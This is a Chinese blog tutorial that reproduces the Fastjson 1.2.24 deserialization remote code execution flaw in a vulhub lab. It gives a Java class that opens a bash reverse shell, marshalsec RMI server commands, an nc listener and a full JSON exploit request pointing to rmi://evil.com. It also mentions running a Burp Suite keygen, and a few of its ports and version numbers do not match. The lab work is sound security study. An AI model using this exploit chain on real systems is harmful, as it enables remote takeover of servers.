Fastjson 1.2.24漏洞搭建及复现

最新推荐文章于 2024-05-14 15:06:25 发布
最新推荐文章于 2024-05-14 15:06:25 发布
阅读量944 收藏 24
点赞数 18
文章标签: 网络安全 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yunshang_secure/article/details/135149002
版权 
title: Fastjson 1.2.24漏洞搭建及复现
date: 2023-12-21 21:07:01
tags:cloud_hat

Fastjson 1.2.24漏洞搭建及复现

环境准备:(这里用的是centos7)

kali linux:(可以准备一个靶机centos,一个攻击机kali)本文章只基于一个kali-2022.4版本演示

apache-maven

marshalsec-master

jdk1.8

python3(kali自带)

影响版本:

fastjson <= 1.2.24

一、配置kali中java环境

注意:

1.担心配置错误的,可以提前拍摄快照,以便还原!!!

2.网上有删除openjdk再下载oracle jdk的,个人不太建议,会报错,影响后续漏洞复现

1.下载oracle的jdk1.8.0_202版本

☁下载地址:

# 华为云镜像下载

https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

# 百度网盘链接

链接:百度网盘 请输入提取码 提取码:dmw4

下载完成后,直接将其复制到kali中

2.新建jdk1.8目录存放安装包

☁在kali中 /usr/local 下新建文件夹 java,存放此安装包,将桌面的jdk-8u202-linux-x64.tar.gz安装包移动到该目录下

1)mkdir -p /usr/local/java # 创建目录

2)cd Desktop # 进入桌面

3)mv jdk-8u202-linux-x64.tar.gz /usr/local/java # 移动安装包至目录下

3.配置jdk环境变量

☁进入目录下,解压此安装包,并配置环境变量

1)cd /usr/local/java

2)tar xzvf jdk-8u202-linux-x64.tar.gz

3)vim /etc/profile

# 编辑该文件,将下方四行代码输入,jdk存放路径和我不同的自行更改

JAVA_HOME=/usr/local/java/jdk1.8.0_202

PATH=$PATH:$HOME/bin:$JAVA_HOME/bin

export JAVA_HOME

export PATH

4.替换原open jdk为oracle jdk

更换原有的openjdk为oracle jdk1.8.0_202

1)update-alternatives --install /usr/bin/java java /usr/local/java/jdk1.8.0_202/bin/java 1 2)update-alternatives --install /usr/bin/javac javac /usr/local/java/jdk1.8.0_202/bin/javac 1 3)update-alternatives --set java /usr/local/java/jdk1.8.0_202/bin/java 4)update-alternatives --set javac /usr/local/java/jdk1.8.0_202/bin/javac

# 存放路径不同的,记得更改~

5)java -version # 看是否成功替换为1.8版本

二、安装并使用docker

1.安装docker

此处就不做过多讲解了,直接上大佬的安装步骤:https://www.cnblogs.com/lijingrong/p/13396884.html

☁跟着上方教程安装完成,查看docker版本号

1)docker -v

2)docker-compose -v

2.安装vulhub

从github上克隆:GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

安装完成查看vulhub目录(有大量的环境漏洞环境)

3.拉取环境

☁进入对应的漏洞环境目录

cd Desktop/vulhub/fastjson/1.2.24-rce

☁启动容器,拉取环境

docker-compose up -d # 首次拉取会自动下载对应配置,出现done字样即为完成

3.1相关报错及处理

若此处出现下图类似报错,则执行下方代码块中命令,然后重新拉取环境即可~(没报错的直接跳过)

1)sudo mkdir -p /etc/docker
​
2)sudo tee /etc/docker/daemon.json <<-'EOF'
​
{
​
 "registry-mirrors": ["https://yxzrazem.mirror.aliyuncs.com"]
​
}
​
EOF
​
3)sudo systemctl daemon-reload
​
4)sudo systemctl restart docker
4.验证环境

☁环境运行完成,有两种验证方式

1)http://your-ip:8090 # 出现json格式的输出,即为成功(下图一)

2)docker ps # 下图二

三、安装maven

1.下载安装包

☁下载地址:

Maven – Download Apache Maven

2.新建maven目录存放安装包

☁移动下载的安装包至 /usr/local/maven 目录下, 并解压

3.配置maven环境变量

☁配置maven的环境变量,并更新(我这个版本是3.96)

1)vim /etc/profile # 将下面三行代码复制到文件内

MAVEN_HOME=/usr/local/maven/apache-maven-3.9.6 PATH=$MAVEN_HOME/bin:$PATH export MAVEN_HOME PATH

2)source /etc/profile # 修改后使环境生效

3)update-alternatives --install /usr/bin/mvn mvn /usr/local/maven/apache-maven-3.9.3/bin/mvn 1

# 更新配置(路径和我不同的小伙伴记得更改"/usr.../maven...")

4)mvn -version # 查看mvn版本,是否安装成功

3.1相关报错及处理

此处报错的小伙伴,可以尝试 "rm -rf maven" 删除maven整个目录,然后重新安装(或验证是否执行上方第3步更新命令)

四、安装RMI服务器

1.下载marshalsec并启动RMI器

☁编译marshalsec项目,启动RMI服务器

1)下载marshalsec

# github下载

GitHub - mbechler/marshalsec

# 百度网盘直接下载

链接:百度网盘 请输入提取码 提取码:aydq 2)cd /usr/local/marshalsec/marshalsec-master # 进入目录下

3)unzip marshalsec-master.zip #解压压缩包

4)mvn clean package -DskipTests # 用maven编译marshalsec成jar包

五、漏洞复现

1.编写文件

☁使用kali攻击机,编写touchfile.java文件,将如下代码写入,并编译为class文件

1)touch touchfile.java

2)vim touchfile.java # 不要直接执行第三步,看好代码输入完成再往下走

3)javac touchfile.java

import java.lang.Runtime;
import java.lang.Process;
​
public class touchfile{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/攻击者ip/攻击者nc监听端口 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

2.开启python监听

☁kali攻击机开启python服务,监听端口 # 注意python版本,执行对应命令

python3 -m http.server 8089 # python3使用的命令

python -m SimpleHTTPServer # python2使用的命令

3.加载远程类

☁kali攻击机使用marshalsec项目,启动RMI服务器,监听端口9999,同时指定加载远程类touchfile.class

# 进入marshalsec-master目录下的target目录下执行,marshalsec是安装RMI的那个目录,target是编译后的目录

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://your-ip:1111/#touchfile" 9999

4.开启反弹shell的监听端口

☁攻击机开启监听6666端口

nc -lvnp 6666

5. bp安装

☁使用kali自带的bp或自己安装想要使用的bp版本

1)将文件夹复制至kali靶机中

2)java -jar burp-loader-keygen.jar # 第一次安装会弹出下图1窗口

3)跟着下方图片步骤一步步操作

6.火狐开启代理抓包

☁进入kali自带的火狐游览器,更改设置,开启代理,端口为bp的8080

记着把bp的拦截开启,此时可以抓到包

POST / HTTP/1.1
Host:your-ip:8090
Accept-Encoding:gzip,deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/touchfile",
        "autoCommit":true
    }
}
7.复现结果验证

使用marshalse工具快捷的开启RMI服务,借助RMI服务将RMI reference result 成功重定向到web服务器

靶机成功访问攻击机开启的web服务,可以下载touchfile.class恶意文件

攻击机监听的6666端口成功收到反弹的shell

至此,复现结束~

总结:复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。

PS:文章对小伙伴有帮助的话,点赞支持下吧~欢迎各位师傅批评指正

yunshang_secure
关注
  • 18
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CentOS7上安装RocketMQ 4.7.1解决fastjson低版本漏洞问题
锐意工作室
08-25 2869
文章目录在CentOS7上安装RocketMQ 4.7.1前言安装过程下载和解压RocketMQ调低RocketMQ的JVM大小bin/runserver.shbin/runserver.shbin/tools.sh启动Name Server启动Broker查看RocketMQ进程测试发送消息和接收消息关闭Broker关闭Name Server修改Name Server的端口安装RocketMQ控制台Troubleshooting参考文档 在CentOS7上安装RocketMQ 4.7.1 前言 阿里的fa
Fastjson<=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 920
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
2024年最全Alibaba Fastjson 入门详细教程_alibaba(5),2024年最新Golang程序员如何有效提升学习效率
2401_84910839的博客
05-14 1113
FastJson 特性| fastjson相对其他JSON库的特点是快,从2011年fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越。| fastjson在阿里巴巴大规模使用,在数万台服务器上部署,fastjson在业界被广泛接受。在2012年被开源中国评选为最受欢迎的国产开源软件之一。| fastjson有非常多的testcase,在1.2.11版本中,testcase超过3321个。每次发布都会进行回归测试,保证质量稳定。
利用docker搭建不同版本fastjson漏洞环境【保姆级教学】
Ciyaso的博客
06-26 1517
利用docker搭建不同版本的fastjson漏洞环境
Fastjson 1.2.24漏洞搭建复现——详解
网安小白的博客
08-02 900
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
2024年最全Alibaba Fastjson 入门详细教程_alibaba(2),2024年最新大厂Golang面试真题精选
2401_84910839的博客
05-14 721
FastJson 特性| fastjson相对其他JSON库的特点是快,从2011年fastjson发布1.1.x版本之后,其性能从未被其他Java实现的JSON库超越。| fastjson在阿里巴巴大规模使用,在数万台服务器上部署,fastjson在业界被广泛接受。在2012年被开源中国评选为最受欢迎的国产开源软件之一。| fastjson有非常多的testcase,在1.2.11版本中,testcase超过3321个。每次发布都会进行回归测试,保证质量稳定。
Linux(CentOS7)搭建FastDfs
北暖的博客
12-31 2216
标题Linux(CentOS7)搭建FastDfs 一、前言 1、FastDFS是一个开源的轻量级分布式文件系统,它对文件进行管理,功能包括:文件存储、文件同步、文件访问(文件上传、文件下载)等,解决了大容量存储和负载均衡的问题。特别适合以文件为载体的在线服务,如相册网站、视频网站等等。 FastDFS为互联网量身定制,充分考虑了冗余备份、负载均衡、线性扩容等机制,并注重高可用、高性能等指标,使用FastDFS很容易搭建一套高性能的文件服务器集群提供文件上传、下载等服务。 2、记录一次搭建过程。 二、搭建
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson1.2.24含源码
02-04
《深入解析Fastjson 1.2.24Fastjson是阿里巴巴开发的一款高性能的Java JSON库,它具有极快的性能,广泛的功能以及简洁易用的API,使其在Java社区中广受欢迎。Fastjson 1.2.24版本是其发展过程中的一个重要里程碑...
fastjson-1.2.24.jar
02-24
java运行依赖jar包
FastJSON的使用
weixin_58724261的博客
08-15 1705
FastJSON是一个高效的Java JSON处理库,它提供了快速的序列化和反序列化功能,以及丰富的高级功能。本文将详细介绍FastJSON的基本用法、高级功能以及最佳实践和常见问题,并附上代码示例。
SpringMVC----FastJson
哈哈
05-06 1090
接上一篇–Jackson:Json处理 对于Json的序列化,FastJson的功能比Jackson要好,如果不想使用Jackson,则也可以按照其他的Json处理方案如:FastJson 1. 安装FastJson 1.1 导入依赖 <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson --> <dependency> <groupId>com.a
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1289
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
[漏洞复现]Fastjson1.2.24反序列化环境搭建+漏洞复现
cj_Hydra's Blog
11-02 1359
前言: Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,pa
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3744
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
Fastjson命令执行漏洞复现1.2.47和1.2.24
xiaobai_20190815的博客
04-12 1154
一、漏洞描述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链 二、影响版本 fastjson <=1.2.48(autoType为关闭状态也可使用) 三、漏洞利用 1、docker 拉取镜像,靶机一键起环境 docker-compose up -d 2、本机编辑恶意java文件,用于反弹shell,监听端口为1234,并编译javac Exploit.j
学了那么久Python还什么都做不了,我觉得你该试试这个方法了
热门推荐
龙叔的博客
11-08 1万+
答应我,别再做无用功了
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值